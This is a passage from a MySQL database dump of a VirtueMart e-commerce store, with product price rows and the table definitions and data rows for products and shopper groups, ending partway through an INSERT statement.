-- Dumping data for table `fz6t4_virtuemart_product_prices`
--

LOCK TABLES `fz6t4_virtuemart_product_prices` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_product_prices` DISABLE KEYS */;
INSERT INTO `fz6t4_virtuemart_product_prices` VALUES (1,16,0,9500.000000,0,0.00000,0,0,144,'0000-00-00 00:00:00','0000-00-00 00:00:00',0,0,'2014-08-03 07:10:07',676,'2020-02-11 19:23:04',676,'0000-00-00 00:00:00',0),(2,18,0,20000.000000,0,0.00000,0,0,144,'0000-00-00 00:00:00','0000-00-00 00:00:00',0,0,'2014-08-03 09:26:39',676,'2020-02-17 09:20:08',676,'0000-00-00 00:00:00',0),(3,17,0,20000.000000,0,0.00000,0,0,144,'0000-00-00 00:00:00','0000-00-00 00:00:00',0,0,'2014-08-03 09:28:05',676,'2020-02-17 09:17:24',676,'0000-00-00 00:00:00',0),(4,19,0,15000.000000,0,0.00000,0,0,144,'0000-00-00 00:00:00','0000-00-00 00:00:00',0,0,'2014-08-03 09:44:50',676,'2020-02-17 09:42:11',676,'0000-00-00 00:00:00',0),(5,20,0,35000.000000,0,0.00000,0,0,144,'0000-00-00 00:00:00','0000-00-00 00:00:00',0,0,'2014-08-03 09:55:07',676,'2020-02-17 09:53:20',676,'0000-00-00 00:00:00',0),(6,21,0,40000.000000,0,0.00000,0,0,144,'0000-00-00 00:00:00','0000-00-00 00:00:00',0,0,'2014-08-03 09:56:35',676,'2020-02-17 10:27:33',676,'0000-00-00 00:00:00',0),(7,22,0,30000.000000,0,0.00000,0,0,144,'0000-00-00 00:00:00','0000-00-00 00:00:00',0,0,'2014-08-03 10:06:12',676,'2020-02-17 08:55:45',676,'0000-00-00 00:00:00',0),(8,29,0,26.000000,0,0.00000,1,-1,47,'0000-00-00 00:00:00','0000-00-00 00:00:00',1,20,'2014-08-07 07:15:11',676,'2014-08-07 07:53:29',676,'0000-00-00 00:00:00',0),(9,29,0,22.000000,0,0.00000,1,0,47,'0000-00-00 00:00:00','0000-00-00 00:00:00',21,100,'2014-08-07 07:38:17',676,'2014-08-07 07:53:29',676,'0000-00-00 00:00:00',0),(10,48,0,50.000000,0,0.00000,1,-1,47,'0000-00-00 00:00:00','0000-00-00 00:00:00',1,20,'2014-08-07 07:49:01',676,'2014-08-07 07:52:19',676,'0000-00-00 00:00:00',0),(11,48,0,42.000000,0,0.00000,1,0,47,'0000-00-00 00:00:00','0000-00-00 00:00:00',21,100,'2014-08-07 07:49:01',676,'2014-08-07 07:52:19',676,'0000-00-00 00:00:00',0),(12,49,0,26.000000,0,0.00000,1,-1,47,'0000-00-00 00:00:00','0000-00-00 00:00:00',1,20,'2014-08-07 07:49:19',676,'2014-08-07 07:55:04',676,'0000-00-00 00:00:00',0),(13,49,0,22.000000,0,0.00000,1,0,47,'0000-00-00 00:00:00','0000-00-00 00:00:00',21,100,'2014-08-07 07:49:19',676,'2014-08-07 07:55:04',676,'0000-00-00 00:00:00',0),(14,28,0,36.000000,0,0.00000,1,0,47,'0000-00-00 00:00:00','0000-00-00 00:00:00',1,20,'2014-08-07 07:57:59',676,'2014-08-07 08:01:22',676,'0000-00-00 00:00:00',0),(15,28,0,30.000000,0,0.00000,1,0,47,'0000-00-00 00:00:00','0000-00-00 00:00:00',21,100,'2014-08-07 07:58:29',676,'2014-08-07 08:01:22',676,'0000-00-00 00:00:00',0),(16,50,0,36.000000,0,0.00000,1,0,47,'0000-00-00 00:00:00','0000-00-00 00:00:00',1,20,'2014-08-07 08:00:19',676,'2014-08-07 08:07:11',676,'0000-00-00 00:00:00',0),(17,50,0,30.000000,0,0.00000,1,0,47,'0000-00-00 00:00:00','0000-00-00 00:00:00',21,100,'2014-08-07 08:00:19',676,'2014-08-07 08:07:11',676,'0000-00-00 00:00:00',0),(18,51,0,6000.000000,0,0.00000,1,0,144,'0000-00-00 00:00:00','0000-00-00 00:00:00',0,0,'2019-09-16 09:42:01',676,'2019-09-16 13:17:17',676,'0000-00-00 00:00:00',0),(19,52,0,7500.000000,0,0.00000,1,0,144,'0000-00-00 00:00:00','0000-00-00 00:00:00',0,0,'2019-09-16 11:50:52',676,'2019-09-19 09:51:09',676,'0000-00-00 00:00:00',0);
/*!40000 ALTER TABLE `fz6t4_virtuemart_product_prices` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_product_shoppergroups`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_product_shoppergroups`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_product_shoppergroups` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_product_id` int unsigned NOT NULL DEFAULT '0',
  `virtuemart_shoppergroup_id` int unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  UNIQUE KEY `virtuemart_product_id` (`virtuemart_product_id`,`virtuemart_shoppergroup_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COMMENT='Maps Products to Categories';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_product_shoppergroups`
--

LOCK TABLES `fz6t4_virtuemart_product_shoppergroups` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_product_shoppergroups` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_virtuemart_product_shoppergroups` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_products`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_products`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_products` (
  `virtuemart_product_id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_vendor_id` int unsigned NOT NULL DEFAULT '1',
  `product_parent_id` int unsigned NOT NULL DEFAULT '0',
  `product_sku` varchar(255) DEFAULT NULL,
  `product_gtin` varchar(64) DEFAULT NULL,
  `product_mpn` varchar(64) DEFAULT NULL,
  `product_weight` decimal(10,4) DEFAULT NULL,
  `product_weight_uom` varchar(7) DEFAULT NULL,
  `product_length` decimal(10,4) DEFAULT NULL,
  `product_width` decimal(10,4) DEFAULT NULL,
  `product_height` decimal(10,4) DEFAULT NULL,
  `product_lwh_uom` varchar(7) DEFAULT NULL,
  `product_url` varchar(255) DEFAULT NULL,
  `product_in_stock` int NOT NULL DEFAULT '0',
  `product_ordered` int NOT NULL DEFAULT '0',
  `product_stockhandle` varchar(24) NOT NULL DEFAULT '0',
  `low_stock_notification` int unsigned NOT NULL DEFAULT '0',
  `product_available_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `product_availability` varchar(32) DEFAULT NULL,
  `product_special` tinyint(1) NOT NULL DEFAULT '0',
  `product_discontinued` tinyint(1) NOT NULL DEFAULT '0',
  `product_sales` int NOT NULL DEFAULT '0',
  `product_unit` varchar(8) DEFAULT NULL,
  `product_packaging` decimal(8,4) unsigned DEFAULT NULL,
  `product_params` varchar(255) NOT NULL,
  `product_canon_category_id` int DEFAULT NULL,
  `hits` int unsigned DEFAULT NULL,
  `intnotes` text,
  `metarobot` varchar(400) DEFAULT NULL,
  `metaauthor` varchar(400) DEFAULT NULL,
  `layout` varchar(16) DEFAULT NULL,
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `pordering` int unsigned NOT NULL DEFAULT '0',
  `has_categories` tinyint(1) DEFAULT NULL,
  `has_manufacturers` tinyint(1) DEFAULT NULL,
  `has_medias` tinyint(1) DEFAULT NULL,
  `has_prices` tinyint(1) DEFAULT NULL,
  `has_shoppergroups` tinyint(1) DEFAULT NULL,
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_product_id`),
  KEY `virtuemart_vendor_id` (`virtuemart_vendor_id`),
  KEY `product_parent_id` (`product_parent_id`),
  KEY `product_special` (`product_special`),
  KEY `published` (`published`),
  KEY `pordering` (`pordering`),
  KEY `created_on` (`created_on`),
  KEY `modified_on` (`modified_on`),
  KEY `product_in_stock` (`product_in_stock`),
  KEY `product_ordered` (`product_ordered`),
  KEY `product_discontinued` (`product_discontinued`),
  KEY `product_sku` (`product_sku`)
) ENGINE=MyISAM AUTO_INCREMENT=67 DEFAULT CHARSET=utf8mb3 COMMENT='All products are stored here.';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_products`
--

LOCK TABLES `fz6t4_virtuemart_products` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_products` DISABLE KEYS */;
INSERT INTO `fz6t4_virtuemart_products` VALUES (2,1,0,'','','',NULL,'KG',NULL,NULL,NULL,'M','',0,0,'0',0,'2014-08-01 00:00:00','',0,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|shared_stock=0|product_box=\"\"|',NULL,NULL,'','','','default',1,0,1,1,1,1,0,'2014-08-01 11:29:40',676,'2020-02-17 06:57:18',676,'0000-00-00 00:00:00',0),(3,1,0,'','','',NULL,'KG',NULL,NULL,NULL,'M','',0,0,'0',0,'2014-08-01 00:00:00','',0,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|product_box=\"\"|',NULL,NULL,'','','','0',0,0,1,1,1,1,0,'2014-08-01 14:12:11',676,'2014-08-02 07:07:40',676,'0000-00-00 00:00:00',0),(4,1,0,'CM-602-L','','',NULL,'KG',NULL,NULL,NULL,'M','',0,0,'0',0,'2014-08-02 00:00:00','',0,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|product_box=\"\"|',NULL,NULL,'','','','0',0,0,1,1,1,1,0,'2014-08-02 07:29:43',676,'2014-08-02 07:39:36',676,'0000-00-00 00:00:00',0),(5,1,0,'','','',NULL,'KG',NULL,NULL,NULL,'M','',0,0,'0',0,'2014-08-02 00:00:00','',0,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|shared_stock=0|product_box=\"\"|',NULL,NULL,'','','','default',0,0,1,1,1,0,0,'2014-08-02 10:50:01',676,'2020-11-26 06:54:35',676,'0000-00-00 00:00:00',0),(6,1,0,'','','',NULL,'KG',NULL,NULL,NULL,'M','',0,0,'0',0,'2014-08-02 00:00:00','',0,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|shared_stock=0|product_box=\"\"|',NULL,NULL,'','','','default',0,0,1,1,1,0,0,'2014-08-02 10:57:34',676,'2020-11-26 07:57:22',676,'0000-00-00 00:00:00',0),(7,1,0,'','','',NULL,'KG',NULL,NULL,NULL,'M','',0,0,'0',0,'2014-08-02 00:00:00','',0,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|shared_stock=0|product_box=\"\"|',NULL,NULL,'','','','default',0,0,1,1,1,1,0,'2014-08-02 11:10:18',676,'2020-02-16 20:22:49',676,'0000-00-00 00:00:00',0),(8,1,0,'','','',NULL,'KG',NULL,NULL,NULL,'M','',0,1,'0',0,'2014-08-02 00:00:00','',0,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|shared_stock=0|product_box=\"\"|',NULL,NULL,'','','','default',1,0,1,1,1,1,0,'2014-08-02 12:48:21',676,'2020-02-17 06:54:46',676,'0000-00-00 00:00:00',0),(9,1,0,'','','',NULL,'KG',NULL,NULL,NULL,'M','',0,0,'0',0,'2014-08-02 00:00:00','',0,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|shared_stock=0|product_box=\"\"|',NULL,NULL,'','','','default',1,0,1,1,1,1,0,'2014-08-02 12:52:00',676,'2020-02-16 21:58:43',676,'0000-00-00 00:00:00',0),(10,1,0,'','','',NULL,'KG',NULL,NULL,NULL,'M','',0,0,'0',0,'2014-08-02 00:00:00','',0,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|shared_stock=0|product_box=\"\"|',NULL,NULL,'','','','default',0,0,1,1,1,0,0,'2014-08-02 13:01:05',676,'2020-11-26 07:57:45',676,'0000-00-00 00:00:00',0),(11,1,0,'','','',NULL,'KG',NULL,NULL,NULL,'M','',0,0,'0',0,'2014-08-02 00:00:00','',1,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|product_box=\"\"|',NULL,NULL,'','','','0',0,0,1,1,1,1,0,'2014-08-02 13:17:31',676,'2014-08-03 19:52:27',676,'0000-00-00 00:00:00',0),(12,1,0,'','','',NULL,'KG',NULL,NULL,NULL,'M','',0,0,'0',0,'2014-08-02 00:00:00','',0,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|product_box=\"\"|',NULL,NULL,'','','','0',0,0,1,1,1,1,0,'2014-08-02 13:21:44',676,'2014-08-03 19:55:39',676,'0000-00-00 00:00:00',0),(13,1,0,'','','',NULL,'KG',NULL,NULL,NULL,'M','',0,0,'0',0,'2014-08-02 00:00:00','',0,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|shared_stock=0|product_box=\"\"|',NULL,NULL,'','','','default',1,0,1,1,1,1,0,'2014-08-02 13:26:06',676,'2020-02-17 07:50:14',676,'0000-00-00 00:00:00',0),(14,1,0,'','','',NULL,'KG',NULL,NULL,NULL,'M','',0,2,'0',0,'2014-08-02 00:00:00','',0,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|shared_stock=0|product_box=\"\"|',NULL,NULL,'','','','default',1,0,1,1,1,1,0,'2014-08-02 13:31:05',676,'2020-02-16 21:40:24',676,'0000-00-00 00:00:00',0),(15,1,0,'','','',NULL,'KG',NULL,NULL,NULL,'M','',0,0,'0',0,'2014-08-02 00:00:00','',0,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|shared_stock=0|product_box=\"\"|',NULL,NULL,'','','','',1,0,1,1,1,1,0,'2014-08-02 13:49:31',676,'2020-02-11 19:26:30',676,'0000-00-00 00:00:00',0),(16,1,0,'','','',NULL,'KG',NULL,NULL,NULL,'M','',0,1,'0',0,'2014-08-03 00:00:00','',0,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|shared_stock=0|product_box=\"\"|',NULL,NULL,'','','','default',1,0,1,0,1,1,0,'2014-08-03 07:06:22',676,'2020-02-11 19:23:04',676,'0000-00-00 00:00:00',0),(17,1,0,'','','',NULL,'KG',NULL,NULL,NULL,'M','',0,0,'0',0,'2014-08-03 00:00:00','',0,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|shared_stock=0|product_box=\"\"|',NULL,NULL,'','','','default',1,0,1,1,1,1,0,'2014-08-03 07:18:16',676,'2020-02-17 09:17:24',676,'0000-00-00 00:00:00',0),(18,1,0,'','','',NULL,'KG',NULL,NULL,NULL,'M','',0,0,'0',0,'2014-08-03 00:00:00','',0,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|shared_stock=0|product_box=\"\"|',NULL,NULL,'','','','default',1,0,1,1,1,1,0,'2014-08-03 09:26:39',676,'2020-02-17 09:20:08',676,'0000-00-00 00:00:00',0),(19,1,0,'','','',NULL,'KG',NULL,NULL,NULL,'M','',0,0,'0',0,'2014-08-03 00:00:00','',0,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|shared_stock=0|product_box=\"\"|',NULL,NULL,'','','','default',1,0,1,1,1,1,0,'2014-08-03 09:35:21',676,'2020-02-17 09:42:11',676,'0000-00-00 00:00:00',0),(20,1,0,'','','',NULL,'KG',NULL,NULL,NULL,'M','',0,0,'0',0,'2014-08-03 00:00:00','',0,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|shared_stock=0|product_box=\"\"|',NULL,NULL,'','','','default',1,0,1,1,1,1,0,'2014-08-03 09:55:07',676,'2020-02-17 09:53:20',676,'0000-00-00 00:00:00',0),(21,1,0,'','','',NULL,'KG',NULL,NULL,NULL,'M','',0,0,'0',0,'2014-08-03 00:00:00','',0,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|shared_stock=0|product_box=\"\"|',NULL,NULL,'','','','default',1,0,1,1,1,1,0,'2014-08-03 09:56:35',676,'2020-02-17 10:27:33',676,'0000-00-00 00:00:00',0),(22,1,0,'','','',NULL,'KG',NULL,NULL,NULL,'M','',0,0,'0',0,'2014-08-03 00:00:00','',0,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|shared_stock=0|product_box=\"\"|',NULL,NULL,'','','','default',1,0,1,1,1,1,0,'2014-08-03 10:05:51',676,'2020-02-17 08:55:45',676,'0000-00-00 00:00:00',0),(23,1,0,'','','',NULL,'KG',NULL,NULL,NULL,'M','',0,0,'0',0,'2014-08-03 00:00:00','',0,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|product_box=\"\"|',NULL,NULL,'','','','0',1,0,1,1,1,1,0,'2014-08-03 10:08:50',676,'2014-08-03 20:12:24',676,'0000-00-00 00:00:00',0),(24,1,0,'','','',NULL,'KG',NULL,NULL,NULL,'M','',0,0,'0',0,'2014-08-03 00:00:00','',0,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|shared_stock=0|product_box=\"\"|',NULL,NULL,'','','','default',1,0,1,1,1,1,0,'2014-08-03 10:28:09',676,'2020-02-17 06:46:06',676,'0000-00-00 00:00:00',0),(25,1,0,'','','',NULL,'KG',NULL,NULL,NULL,'M','',0,0,'0',0,'2014-08-03 00:00:00','',0,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|shared_stock=0|product_box=\"\"|',NULL,NULL,'','','','default',1,0,1,1,1,1,0,'2014-08-03 10:46:27',676,'2020-02-17 08:09:23',676,'0000-00-00 00:00:00',0),(26,1,0,'','','',NULL,'KG',NULL,NULL,NULL,'M','',0,0,'0',0,'2014-08-03 00:00:00','',0,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|product_box=\"\"|',NULL,NULL,'','','','0',0,0,1,1,1,1,0,'2014-08-03 11:01:59',676,'2014-08-03 20:27:28',676,'0000-00-00 00:00:00',0),(27,1,0,'','','',NULL,'KG',NULL,NULL,NULL,'M','',0,0,'0',0,'2014-08-03 00:00:00','',0,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|product_box=\"\"|',NULL,NULL,'','','','0',0,0,1,1,1,1,0,'2014-08-03 11:11:22',676,'2014-08-03 20:26:25',676,'0000-00-00 00:00:00',0),(28,1,0,'','','',NULL,'KG',NULL,NULL,NULL,'M','',0,11,'0',0,'2014-08-03 00:00:00','',0,0,0,'KG',0.4500,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|product_box=\"\"|',NULL,NULL,'','','','0',0,0,1,1,1,1,0,'2014-08-03 11:16:41',676,'2014-08-07 08:01:22',676,'0000-00-00 00:00:00',0),(29,1,0,'','','',NULL,'KG',NULL,NULL,NULL,'M','',0,29,'0',0,'2014-08-03 00:00:00','',0,0,0,'KG',0.5000,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|product_box=\"\"|',NULL,NULL,'','','','0',0,0,1,1,1,1,0,'2014-08-03 11:23:56',676,'2014-08-07 07:53:29',676,'0000-00-00 00:00:00',0),(30,1,0,'','','',NULL,'KG',NULL,NULL,NULL,'M','',0,0,'0',0,'2014-08-03 00:00:00','',0,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|product_box=\"\"|',NULL,NULL,'','','','0',0,0,1,1,1,1,0,'2014-08-03 11:24:03',676,'2014-08-03 11:25:36',676,'0000-00-00 00:00:00',0),(31,1,0,'','','',NULL,'KG',NULL,NULL,NULL,'M','',0,0,'0',0,'2014-08-03 00:00:00','',0,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|product_box=\"\"|',NULL,NULL,'','','','0',0,0,1,1,1,1,0,'2014-08-03 11:28:57',676,'2014-08-03 11:32:01',676,'0000-00-00 00:00:00',0),(32,1,0,'','','',NULL,'KG',NULL,NULL,NULL,'M','',0,0,'0',0,'2014-08-03 00:00:00','',0,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|product_box=\"\"|',NULL,NULL,'','','','0',0,0,1,1,1,1,0,'2014-08-03 11:32:07',676,'2014-08-03 20:31:35',676,'0000-00-00 00:00:00',0),(33,1,0,'','','',NULL,'KG',NULL,NULL,NULL,'M','',0,0,'0',0,'2014-08-03 00:00:00','',0,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|product_box=\"\"|',NULL,NULL,'','','','0',0,0,1,1,1,1,0,'2014-08-03 11:44:06',676,'2014-08-03 20:30:56',676,'0000-00-00 00:00:00',0),(34,1,0,'','','',NULL,'KG',NULL,NULL,NULL,'M','',0,0,'0',0,'2014-08-03 00:00:00','',0,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|product_box=\"\"|',NULL,NULL,'','','','0',0,0,1,1,1,1,0,'2014-08-03 11:49:20',676,'2014-08-03 20:30:13',676,'0000-00-00 00:00:00',0),(35,1,0,'','','',NULL,'KG',NULL,NULL,NULL,'M','',0,0,'0',0,'2014-08-03 00:00:00','',0,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|product_box=\"\"|',NULL,NULL,'','','','0',0,0,1,1,1,1,0,'2014-08-03 11:52:21',676,'2014-08-03 20:29:29',676,'0000-00-00 00:00:00',0),(36,1,0,'','','',NULL,'KG',NULL,NULL,NULL,'M','',0,0,'0',0,'2014-08-03 00:00:00','',0,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|product_box=\"\"|',NULL,NULL,'','','','0',0,0,1,1,1,1,0,'2014-08-03 11:58:35',676,'2014-08-03 12:12:10',676,'0000-00-00 00:00:00',0),(39,1,0,'','','',NULL,'KG',NULL,NULL,NULL,'M','',0,0,'0',0,'2014-08-01 00:00:00','',0,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|product_box=\"\"|',NULL,NULL,'','','','0',0,0,1,1,1,1,0,'2014-08-03 12:41:15',676,'2014-08-03 19:48:54',676,'0000-00-00 00:00:00',0),(38,1,0,'','','',NULL,'KG',NULL,NULL,NULL,'M','',0,0,'0',0,'2014-08-03 00:00:00','',0,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|product_box=\"\"|',NULL,NULL,'','','','0',0,0,1,1,1,1,0,'2014-08-03 12:05:31',676,'2014-08-03 20:32:40',676,'0000-00-00 00:00:00',0),(40,1,0,'NM-EJM7D','','',NULL,'KG',NULL,NULL,NULL,'M','',0,0,'0',0,'2014-08-02 00:00:00','',0,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|shared_stock=0|product_box=\"\"|',NULL,NULL,'','','','default',0,0,1,1,1,0,0,'2014-08-03 12:48:43',676,'2020-11-26 06:52:44',676,'0000-00-00 00:00:00',0),(41,1,0,'','','',NULL,'KG',NULL,NULL,NULL,'M','',0,0,'0',0,'2014-08-03 00:00:00','',0,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|shared_stock=0|product_box=\"\"|',NULL,NULL,'','','','default',1,0,1,1,1,1,0,'2014-08-03 18:37:11',676,'2020-02-17 07:37:13',676,'0000-00-00 00:00:00',0),(42,1,0,'','','',NULL,'KG',NULL,NULL,NULL,'M','',0,0,'0',0,'2014-08-03 00:00:00','',0,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|shared_stock=0|product_box=\"\"|',NULL,NULL,'','','','default',1,0,1,1,1,1,0,'2014-08-03 18:39:48',676,'2020-02-17 07:41:49',676,'0000-00-00 00:00:00',0),(43,1,0,'','','',NULL,'KG',NULL,NULL,NULL,'M','',0,0,'0',0,'2014-08-03 00:00:00','',0,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|shared_stock=0|product_box=\"\"|',NULL,NULL,'','','','default',1,0,1,1,1,1,0,'2014-08-03 18:44:36',676,'2020-02-17 07:46:05',676,'0000-00-00 00:00:00',0),(44,1,0,'','','',NULL,'KG',NULL,NULL,NULL,'M','',0,0,'0',0,'2014-08-03 00:00:00','',0,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|shared_stock=0|product_box=\"\"|',NULL,NULL,'','','','default',1,0,1,1,1,1,0,'2014-08-03 19:13:20',676,'2020-02-17 08:05:01',676,'0000-00-00 00:00:00',0),(45,1,0,'','','',NULL,'KG',NULL,NULL,NULL,'M','',0,0,'0',0,'2014-08-03 00:00:00','',0,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|shared_stock=0|product_box=\"\"|',NULL,NULL,'','','','default',1,0,1,1,1,1,0,'2014-08-03 19:14:40',676,'2020-02-17 07:57:14',676,'0000-00-00 00:00:00',0),(46,1,0,'','','',NULL,'KG',NULL,NULL,NULL,'M','',0,0,'0',0,'2014-08-03 00:00:00','',0,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|product_box=\"\"|',NULL,NULL,'','','','0',1,0,1,1,1,1,0,'2014-08-03 20:35:53',676,'2014-08-03 20:49:44',676,'0000-00-00 00:00:00',0),(47,1,0,'','','',NULL,'KG',NULL,NULL,NULL,'M','',0,0,'0',0,'2014-08-03 00:00:00','',0,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|product_box=\"\"|',NULL,NULL,'','','','0',1,0,1,1,1,1,0,'2014-08-03 20:52:43',676,'2014-08-03 21:10:26',676,'0000-00-00 00:00:00',0),(48,1,0,'','','',NULL,'KG',NULL,NULL,NULL,'M','',0,0,'0',0,'2014-08-03 00:00:00','',0,0,0,'KG',0.5000,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|product_box=\"\"|',NULL,NULL,'','','','0',0,0,1,1,1,1,0,'2014-08-07 07:49:01',676,'2014-08-07 07:52:19',676,'0000-00-00 00:00:00',0),(49,1,0,'','','',NULL,'KG',NULL,NULL,NULL,'M','',0,0,'0',0,'2014-08-03 00:00:00','',0,0,0,'KG',0.5000,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|product_box=\"\"|',NULL,NULL,'','','','0',0,0,1,1,1,1,0,'2014-08-07 07:49:19',676,'2014-08-07 07:55:04',676,'0000-00-00 00:00:00',0),(50,1,0,'','','',NULL,'KG',NULL,NULL,NULL,'M','',0,2,'0',0,'2014-08-03 00:00:00','',0,0,0,'KG',0.4500,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|product_box=\"\"|',NULL,NULL,'','','','default',0,0,1,1,1,1,0,'2014-08-07 08:00:19',676,'2014-08-07 08:07:11',676,'0000-00-00 00:00:00',0),(51,1,0,'3S-CNC-01-750x750','','',NULL,'KG',750.0000,750.0000,1000.0000,'MM','',1,0,'0',0,'2019-09-16 00:00:00','',0,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|product_box=\"\"|',NULL,NULL,'','','','',1,0,1,1,1,1,0,'2019-09-16 09:17:49',676,'2019-09-16 13:17:17',676,'0000-00-00 00:00:00',0),(52,1,0,'3S-CNC-01-1500x1500','','',NULL,'KG',1500.0000,1500.0000,1000.0000,'MM','',1,0,'0',0,'2019-09-16 00:00:00','',1,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|product_box=\"\"|',NULL,NULL,'','','','',1,0,1,1,1,1,0,'2019-09-16 11:50:52',676,'2019-09-19 09:51:09',676,'0000-00-00 00:00:00',0),(53,1,0,'lps-c','','',NULL,'KG',NULL,NULL,NULL,'M','',0,0,'0',0,'2014-08-02 00:00:00','',0,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|shared_stock=0|product_box=\"\"|',NULL,NULL,'','','','default',0,0,1,1,1,0,0,'2020-02-11 09:30:22',676,'2020-11-26 06:53:57',676,'0000-00-00 00:00:00',0),(55,1,0,'','','',NULL,'KG',NULL,NULL,NULL,'M','',0,0,'0',0,'2020-02-11 00:00:00','',0,0,0,'KG',NULL,'min_order_level=\"\"|max_order_level=\"\"|step_order_level=\"\"|shared_stock=0|product_box=\"\"|',NULL,NULL,'','','','',0,0,1,1,1,0,0,'2020-02-11 12:21:44',676,'2020-11-26 06:53:34',676,'0000-00-00 00:00:00',0),(56,1,0,'','','',NULL,'KG',NULL,NULL,NULL,'M','',0,0,'0',0,'2014-08-02 